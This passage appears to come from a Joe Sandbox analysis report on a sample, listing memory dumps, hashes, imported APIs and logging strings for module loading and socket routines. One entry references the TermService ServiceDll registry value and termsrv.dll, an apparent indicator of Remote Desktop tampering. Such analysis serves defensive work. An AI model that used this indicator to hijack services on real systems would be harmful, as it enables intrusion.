    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
    • API String ID: 1224403792-3063791425
    • Opcode ID: eb0fdf5a52035e31f9b93b02363c65b3b7edd3b62af9a89ee9e7b579716066ff
    • Instruction ID: 31962c3a6d2dac2187c317b336da58ed17d02785108a593a6d912458da1d5c0f
    • Opcode Fuzzy Hash: eb0fdf5a52035e31f9b93b02363c65b3b7edd3b62af9a89ee9e7b579716066ff
    • Instruction Fuzzy Hash: 40F08191F0A71751FA32AF95E8007B66351AF48BC1F084131DD9C1B7B4EE2CE946CB00
    APIs
    • GetProcAddress.KERNEL32(?,?,00000000,000001FC7A4F13D0,?,00007FF6EF65292B), ref: 00007FF6EF6522A3
    • GetLastError.KERNEL32(?,?,00000000,000001FC7A4F13D0,?,00007FF6EF65292B), ref: 00007FF6EF6522D6
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: AddressErrorLastProcfflushfwrite
    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
    • API String ID: 1224403792-3063791425
    • Opcode ID: b0a6d3e5865f81b89bef5a90978b9687aa28697f4e7b707de482767387c3c824
    • Instruction ID: 960d4892f4b8a3d42a4e6918d2dad1adbe3078acdaf5f398c868670143f8ab6b
    • Opcode Fuzzy Hash: b0a6d3e5865f81b89bef5a90978b9687aa28697f4e7b707de482767387c3c824
    • Instruction Fuzzy Hash: 4BF0F462A1965793FE118789B9003B563197F84BC4F044431EC4CDBB96EE2EE542B30A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLastfflushfwriteshutdown
    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
    • API String ID: 2143829457-932964775
    • Opcode ID: 81c7785444ec93e42f33436c825c597045846b0bfe35188d8e25685cf7b0d14f
    • Instruction ID: 47999a3aa1e74137f2177052dbea8fe9dcfda6902f05f2f31c157603a3c67a2a
    • Opcode Fuzzy Hash: 81c7785444ec93e42f33436c825c597045846b0bfe35188d8e25685cf7b0d14f
    • Instruction Fuzzy Hash: 33F03061A0CD03CDEA506B17E8440B95692AF75770F9442F2E97EB65B19F2CA587C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLastLibraryLoadfflushfwrite
    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
    • API String ID: 4085810780-3386190286
    • Opcode ID: a7ec13649a17c9f296edd1ddf330fe53298f0f0572134f32d410f2f50dfae7a0
    • Instruction ID: de919d2a3f9f4052b33fa6b8bec88dbb316749ce1051436b5da056816c0fe53c
    • Opcode Fuzzy Hash: a7ec13649a17c9f296edd1ddf330fe53298f0f0572134f32d410f2f50dfae7a0
    • Instruction Fuzzy Hash: 19F05E50E0AE07DDFE16A757AC404B822515F35BE4B4802F5CC2E77BB9ED2CA986C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: ErrorLastLibraryLoadfflushfwrite
    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
    • API String ID: 4085810780-3386190286
    • Opcode ID: 0c1ec81c012836d593d8cfeb6e880fcc37db11f95d33002ca5ace1c55a727c96
    • Instruction ID: b91a66dafe356c0482cc49bb4f90dc415e874de0249b6661afc9b59f9a6389de
    • Opcode Fuzzy Hash: 0c1ec81c012836d593d8cfeb6e880fcc37db11f95d33002ca5ace1c55a727c96
    • Instruction Fuzzy Hash: 44F08251F0AB4782FD61A766A8405F83750AF49B90F480433CDEC27771FD6CA996C300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastLibraryLoadfflushfwrite
    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
    • API String ID: 4085810780-3386190286
    • Opcode ID: d66374e4bdbea6f61e08899def35e8317f9e7e6149a74294acc491db3abd8399
    • Instruction ID: 479be8918d2a4963844eaf5b632e46b728e71d411bf1bb6aaeb04c34440b0137
    • Opcode Fuzzy Hash: d66374e4bdbea6f61e08899def35e8317f9e7e6149a74294acc491db3abd8399
    • Instruction Fuzzy Hash: 47F03A14A4AE4F42FE5B975BAC508B412506F59BA4F4918B1C84C163F5FD9CA6468301
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastfflushfwriteshutdown
    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
    • API String ID: 2143829457-932964775
    • Opcode ID: 647ec9a6474c3ce2ded0ce020ed30b3c254edba3260fd2ea662633b1e61844fa
    • Instruction ID: 4ad684ae0597118295869443ff85bc1f59463545a50099df43741b8296f26dae
    • Opcode Fuzzy Hash: 647ec9a6474c3ce2ded0ce020ed30b3c254edba3260fd2ea662633b1e61844fa
    • Instruction Fuzzy Hash: 41F0BE60E0CC4B92EF10A72BEC404F92350AF64B70F4445B2D94CA21F0EEECA5468300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: ErrorLastLibraryLoadfflushfwrite
    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
    • API String ID: 4085810780-3386190286
    • Opcode ID: 9bdefb8062eca152b0a01fece91af8055a68741610badecb24aaf549b6050509
    • Instruction ID: 3bde895005e85f58b473c3fc47efec168e9761d7951b3f4a0313849a359d6a8b
    • Opcode Fuzzy Hash: 9bdefb8062eca152b0a01fece91af8055a68741610badecb24aaf549b6050509
    • Instruction Fuzzy Hash: 20F05E90E0EF1791FF55A7DBAC446B616585F04BA4B8824B1CC1C16771EE1CB6868300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: ErrorLastLibraryLoadfflushfwrite
    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
    • API String ID: 4085810780-3386190286
    • Opcode ID: 204679f2bc6990ee039635e80533796441804ce913d51fdb0f0c30e57cf1dc65
    • Instruction ID: 8c32586742da992eeab4aa466bec80fbcd74746b55932399cf2c193bb3180154
    • Opcode Fuzzy Hash: 204679f2bc6990ee039635e80533796441804ce913d51fdb0f0c30e57cf1dc65
    • Instruction Fuzzy Hash: 22F08260E0D60791FD61B756E8588B41260AF14F84F880433CCDD57B76EF1CA6858340
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: ErrorLastLibraryLoadfflushfwrite
    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
    • API String ID: 4085810780-3386190286
    • Opcode ID: 686306819c2a09d593eccbd7795ed499a59cbd018ae1df6e3997cc1e30a67803
    • Instruction ID: 3b06903d357892aa4561999b4a8a638ee9a77d331bb3d14ef4c0ad31fe7b3c3f
    • Opcode Fuzzy Hash: 686306819c2a09d593eccbd7795ed499a59cbd018ae1df6e3997cc1e30a67803
    • Instruction Fuzzy Hash: D6F05E91F4A71794F935AF6AB8406B01350AF48B85F480431CD9C17375EE1CA585CB00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLastclosesocketfflushfwrite
    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
    • API String ID: 152032778-2221966578
    • Opcode ID: 6af199e007f7996adef2354847391c1866e0faceae043af5748924d3a34d83d2
    • Instruction ID: 843f7e7aa909cf5b563231683481478aaac8d4aa1184e2ce2db6903befc2d012
    • Opcode Fuzzy Hash: 6af199e007f7996adef2354847391c1866e0faceae043af5748924d3a34d83d2
    • Instruction Fuzzy Hash: CFF01751A08D07CDEA505767EC500B812619F74BB0F5413F2F53EA6AF2AE2CA585C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastclosesocketfflushfwrite
    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
    • API String ID: 152032778-2221966578
    • Opcode ID: 5c1e49d14630147fd45c250221ae436a73f99f9082e26558f7669a6334cef7e2
    • Instruction ID: 0a2a793c9a1e41d4a1a783099e82db4d1d2f55d8198fd5730cab2fdbd797e57e
    • Opcode Fuzzy Hash: 5c1e49d14630147fd45c250221ae436a73f99f9082e26558f7669a6334cef7e2
    • Instruction Fuzzy Hash: 4CF01790E08E0F82FF10A777AC601F522509FA0B78F1403F1D47E561F1AEDCA5468300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Openstrcmpstrlen
    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
    • API String ID: 679246061-1413152910
    • Opcode ID: 597314c88170177da13323ae43dc6bbc86ed60a82292b5fff92895f5b433da90
    • Instruction ID: 76857ac2b398de6ac8b22a0b043e0d6362d1c64ee173341dd348b354be19c4cc
    • Opcode Fuzzy Hash: 597314c88170177da13323ae43dc6bbc86ed60a82292b5fff92895f5b433da90
    • Instruction Fuzzy Hash: 2C214F72A1CA8790EF209720E8803FAA362EF90744F840433E6DD465AAEF3CD649C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLastfflushfwriteioctlsocket
    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
    • API String ID: 325303940-110789774
    • Opcode ID: 67b81b3e321f83b0a377acde5c8563e56ea9b9e6c9116943a0a0c80d8480ee6b
    • Instruction ID: 03c1d703ba9fe8217a6ef3284a535ca0bdde6bc5b59e3ebcb3bcd4b937e6af49
    • Opcode Fuzzy Hash: 67b81b3e321f83b0a377acde5c8563e56ea9b9e6c9116943a0a0c80d8480ee6b
    • Instruction Fuzzy Hash: F0F06861E0CD428BF7105B1BE8001695161EBA47B4F5043B1EC3EA3BB4DE7C98868708
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: ErrorLastfflushfwriteioctlsocket
    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
    • API String ID: 325303940-110789774
    • Opcode ID: 1bb1a86083e732082e70f61e6f26960f59807adbd804a3acfd8e422177820506
    • Instruction ID: f124d82916ac5e47f5abdfbcedc33fe763717c6dac86ef67205d2b66b0c7140d
    • Opcode Fuzzy Hash: 1bb1a86083e732082e70f61e6f26960f59807adbd804a3acfd8e422177820506
    • Instruction Fuzzy Hash: 6CF0BBA1F0C602D6F7105779A8005B97261FF84B94F504133EDAE837B4EE7CD94A8701
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastfflushfwriteioctlsocket
    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
    • API String ID: 325303940-110789774
    • Opcode ID: fa09b0463edbfd2061fbf53e399055cb70d8a4dc0786267002d6f33b0874ef2f
    • Instruction ID: ee7c378006e039c3ac3363a5918233a31a0a7b7222566b919fb31cea456aaab8
    • Opcode Fuzzy Hash: fa09b0463edbfd2061fbf53e399055cb70d8a4dc0786267002d6f33b0874ef2f
    • Instruction Fuzzy Hash: 6EF04F61B0894A82F710576BBC002B55560AB947B4F5042B2ED6D937F4EDECE9478701
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: ErrorLastfflushfwriteioctlsocket
    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
    • API String ID: 325303940-110789774
    • Opcode ID: b31bedb8392103279b1503e0ed231db2542c646e653bb9ebc1efd82847c8f02a
    • Instruction ID: 088ef4594d5ee82be3e197ae390a24a54a2d0f50d2f3df1074d0c3b0bfb87581
    • Opcode Fuzzy Hash: b31bedb8392103279b1503e0ed231db2542c646e653bb9ebc1efd82847c8f02a
    • Instruction Fuzzy Hash: 75F0FC61F0C95382F720579BBC002BB5178AB84774F545571EC5D837B4DE3CE9468701
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: ErrorLastfflushfwriteioctlsocket
    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
    • API String ID: 325303940-110789774
    • Opcode ID: 34f6d230b1f557c43f196a0a2afa8808660aff0a6bcf451680a4fb4d396bcae0
    • Instruction ID: 7e59e7b21cd8c55fecd61dd4ca228c292d755f49c5867b171fa952976750827e
    • Opcode Fuzzy Hash: 34f6d230b1f557c43f196a0a2afa8808660aff0a6bcf451680a4fb4d396bcae0
    • Instruction Fuzzy Hash: 69F0F061F0C50397F3205729A8005B966A0BF84BA4F548233EDAE933B5EE3CE846C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: ErrorLastfflushfwriteioctlsocket
    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
    • API String ID: 325303940-110789774
    • Opcode ID: 8a5a6a26d74a6a2ae8b6abbd23f733f5fcfdce090074c6ef011ce3d369f758ca
    • Instruction ID: 21abcc701e80ffd5f0eb717725375078188062b55c16f97ac41762616306da05
    • Opcode Fuzzy Hash: 8a5a6a26d74a6a2ae8b6abbd23f733f5fcfdce090074c6ef011ce3d369f758ca
    • Instruction Fuzzy Hash: 4CF09CE2F0C64346F7316F59A80027555A0EB94794F104135EDEE577B4DE7CD8868F00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
